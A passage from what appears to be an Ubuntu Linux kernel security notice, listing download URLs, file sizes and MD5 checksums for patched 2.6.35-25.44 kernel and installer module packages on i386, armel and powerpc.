\r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 351400 577df549e24af64726d849ee53cb4164\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 416584 0f598a67362137fde8617714bcbc0d1b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 416684 2e88e51ffa5e8c19dd8d808f36c0ad40\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 284730 7262d62f5ff4e0ed401c2d7137bee9dd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 95374 abcecbd0156936056c62c3a8ceccb223\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 95406 0413e8c32c36f96130cc01e4ce60c419\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 303620 713da47f59e6fe58b0f13fd465083820\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 304218 572b5fd1f366a2dfa187864278ede107\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 162044 23a9d632e47a4542e0350cedbef31c2c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 4599830 da26020187aa16381aa72cdeb6760524\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 4729808 bca440e8c1bd3ca9b8cf2abe7cabf2d3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 4742902 b76e0e3ef7117456ee4f04098e2643c6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25-generic-pae_2.6.35-25.44_i386.deb\r\n Size/MD5: 789454 26151f34fbcc00ba989429103624cbff\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25-generic_2.6.35-25.44_i386.deb\r\n Size/MD5: 787572 6b11774da360d38fe48ccf383bdab194\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25-virtual_2.6.35-25.44_i386.deb\r\n Size/MD5: 789970 d9df001cd2e7d83f27558136531fae6a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.35-25-generic-pae_2.6.35-25.44_i386.deb\r\n Size/MD5: 34058830 67fb35d704d531d2fd23237fc137391a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.35-25-generic_2.6.35-25.44_i386.deb\r\n Size/MD5: 33913440 96a664d2d94c5a0ae71f6e38ad9e3ff6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.35-25-virtual_2.6.35-25.44_i386.deb\r\n Size/MD5: 10586962 cdbf3c7a539e5c4dcd4d426ff3bdb607\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.35-1025.44_i386.deb\r\n Size/MD5: 811970 6465c0b50bbd485d0f79feae39822b4d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.35-25_2.6.35-25.44_i386.deb\r\n Size/MD5: 250296 11f3af84f8733243de455c6ce06f7a35\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 187322 af91528ec0ca0966e924de2773fa36a4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 187610 f0c3b9542053c196550086d03d534fbd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 187602 ce356fac153d82a965e6281b189ac88c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 260082 9cb39799d8c8c640ef94701e0ecb921a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 262642 8e2b90bcccd76f99d953b015090a13f9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 141240 7b62103074aa051393fe67a00c9d7b19\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 34790 c99c7bf39234b77ac00feb40229e6de3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 34798 006cb0cc1d8c7ea38501bc8178812b60\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 34782 58dcd7b6f1fbfef04a6d96997a93a48b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 343478 a5e322452ecdab67cf3c554fd5493fb5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 343510 4727c16b5fba069f7946cfd8cef7ed9d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 2559840 771e19cf1db5dfa33b03da39a59a4e3f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 2578948 99928d16dd2a493d5769fcf7d27f1e21\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 778390 b7961765324c36286c158ad93fe0261b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 123004 09cbedabe72e28faf84a1e6cea332cb4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 123204 0cb9a3ccdc207ee7a91ee4ab211f56a1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 254190 7de53d9ee41756b6a410ec856805a36f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 254224 1b1394bf1f0fba9799d5b88c5c49cac4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 235392 a07631838e4528d2bc73cc9d3cf40025\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 245906 4d02612c4caa4ff475d76f75e85d22c9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 245896 adff10c41ee5ed9e62ae507485af9c15\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 36498 f13ec04c429b95fa26c46f5bea49bbce\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 36690 ea293fd62c9dd2506287732c02a3416d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 36688 dece37a0ca990b895106c04d5d054941\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 148624 d288f6e304fcb5c50867d4d4e04d8edb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 148658 a35638e04d21916be206275fcd0dc8ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 80428 37ac6ed992d5cd7cf1d3af21e86becc5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 81236 5869ffecc47ad4b12b48217dbf0343c0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 49170 4c3ceca92bbcdb37042ececf79c6cd73\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 49254 98e667af3075f2b574f391b0bc51eb62\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 9122 7e2c0760fedfbbaded17f8b27f61ba46\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 9120 ce0f518ff22624a503c6e26c1888182d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 37584 4b820fca51d2bda1d35144aec9e8c26f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 37596 aa171692f94ab298add67123791e9199\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 37596 f5f4402b68c802ab69b20c09244df665\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 102320 2ceb0b6b33b3526f68d6a527beb84d19\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 102842 fd3474b98ec7f74739e2c382b93dc676\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 10730 12c71abebaa5742a5f894586563ead9e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 1705060 a3f0f1d47c2c8e5f7bb8110f38113077\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 1655010 0fad9fe2e387956b3f02e0f59ffcc7b6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 235792 700cc93fdb8ad95087eb136ba5e722d8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 37710 371a181afd7dbe2f342e07b9a5d00777\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 37718 ff3711647173480cb43fcfa8e4821f40\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 18138 80ba316fc13e2fa8f1f6e0c54a5dd840\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 18146 5b750e04cc78cfa9226dd6bd4c415345\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 18146 99a39567cc31db4aa178851c4c9bf90a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 51514 9a103036fdcce3c0cf3f33421265be3b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 51526 4a46a5ff0274bd077d01a46999e02580\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 51506 954392e3edd598e4e43394362a71a882\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 117332 2bc4dfe2800af9bc76e36af4f5b905a9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 117628 4daba2e467cea3d82b768ae806deed43\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 16590 33e98f8be1eae113e46ff1d8fcf60f3c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 6284 6b8ef7373738b33d2f9aaaa621f06c27\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 4924 e99a235bb9ce694cb4bdd4b98e9a142d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 21316 21717ae3daede35e4adef2b8c4f7dd0c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 21320 d76315ff205196a652f8281303454f9a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 21314 d7849e7a2c0f0815542a9de2a8c44e3a\r\n\r\n armel architecture (ARM Architecture):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 28476 7c4a2aad3c7fc071f019332b16954395\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 128756 902a5ef90285095a993e17e431bcdd7a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 70324 e0d52c3de25569e7f94d1e45745c6420\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 51230 9d6699ecfa6ea96fbde0f32baa75aa78\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 42962 10030a25cd99c5a877a177181611167e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 88102 898b08d682d52c54135260f65845325b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 685644 0e7d8edc6af848495998333d6123c1a5\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 507548 5419bea97ff75811687732a23a59d309\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 111238 04609a1641a3c78654be18202c62b021\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 94980 196f5ac10da9064e27f89baafe586b1e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 267600 ce3694c15cb95d9e285f533356251859\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 4073672 2e0c0b8f51e51460d8ff6a47491c0e5e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 3375492 490d02f80c20b29566848cd48b0e7bf2\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.35-25-omap_2.6.35-25.44_armel.deb\r\n Size/MD5: 776624 ae19a7629b844fb7252be78f84be50e0\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.35-25-versatile_2.6.35-25.44_armel.deb\r\n Size/MD5: 793428 a8c6ef379f74b9ee80dd959ef4cddd4f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.35-25-omap_2.6.35-25.44_armel.deb\r\n Size/MD5: 19545118 d8604b2d5ae639f1d3b5d606f138c16c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.35-25-versatile_2.6.35-25.44_armel.deb\r\n Size/MD5: 21981998 7e0e1d7e0214ef669bcb71bdabb24372\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.35-1025.44_armel.deb\r\n Size/MD5: 808702 8e795bbaf55eb87d76d1fba35960b8b3\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.35-25_2.6.35-25.44_armel.deb\r\n Size/MD5: 252440 5d4b0f52f3c39a63596b500b83135f1e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 201686 bdd3e6a0cab7cbd546406c163e75f806\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 174668 2a9b13cefb0f16d6763d531349a5f435\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 290292 103f3a5f7ddde2fe0981c5992379ed9f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 33500 fcf1c81fa8b45bc4bc91fff49e446fba\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 386304 df53c30225b8cd877f8039bf7d044f9c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 165148 2a0c9a28fe18786aa4e10cbb62b352de\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 450158 3c17d8ce11ac09bd188e06c620074129\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 293664 b98923b80a374275f55dbc424d312f39\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 248182 ba4b6677b79f272fc417fdc8842e255a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 226986 0e1eb13f6b1997c8e9cf85163c3f8e64\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 21650 ae3e613a80f927e7e1f917433bc1463d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 102152 9693ada8173d6b59faf57ed5c6b958df\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 10704 090d298191b5359b5a983994504aea1b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 44668 4b127c9b3c40b135c82218972a15cfbc\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 35474 0273401c706f058d1353dd8b437dee54\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 19642 de195295ad1b194df19b879a0976946e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 101320 2137fc2abc737035337ba8eb6baaf194\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 239914 a0e575e8bc5a40c0511f6c7a20ed83fd\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 51452 2997ec3ebca7fe48e0b6fef331ad0dcb\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 21688 82c308cc19cebcb4b26f18032ae122a1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 17484 fb72cf64c06448631723cc2c2d049763\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 56552 10482f3f569eba9d641d7f831f44abad\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 94878 de4a218ce33025140a00577f97e7b38e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 134482 9c85b0f772c9855edca71256566be740\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.35-25-omap-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 26578 56d2b2b230d38e2175e67df803d673be\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.35-25-versatile-di_2.6.35-25.44_armel.udeb\r\n Size/MD5: 21416 70868875749dae30f6f8ec8fde920681\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 345992 0c8e51ed5407cad9ee703f06589de605\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 288514 3610285b5100cb40ed3f2a3be409686b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 57494 e874c66a9260e37d0b766aef08faa9bc\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 62538 84a266d3b3ad0d600bd9aef71ab1dc58\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 48912 0ef2000eafcc387fc1316ea90fbf8496\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 53816 d44265f0d0b323be0a72c88412f4883e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 97084 bdb413eb356adc9e72e14262f938c895\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 110264 e132d1e85c1f24fd3331ac5d99245f3f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 41710 16242617fd76ea70ca2f4a0f43d4d80f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 40922 77affc2fa8c517fbde70a6f4198d9864\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 666120 a6b8c6e701b722bebb86dd514282557a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 697746 c22174a72f924fb4e8b03bea2e48674c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 487802 1cddaebd6a99273e768f72edffe858c3\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 507280 8e8d6881204e9fd4b60e0438524a4912\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 109294 112ad37e1bc5a3831d41db7190ce7598\r\n 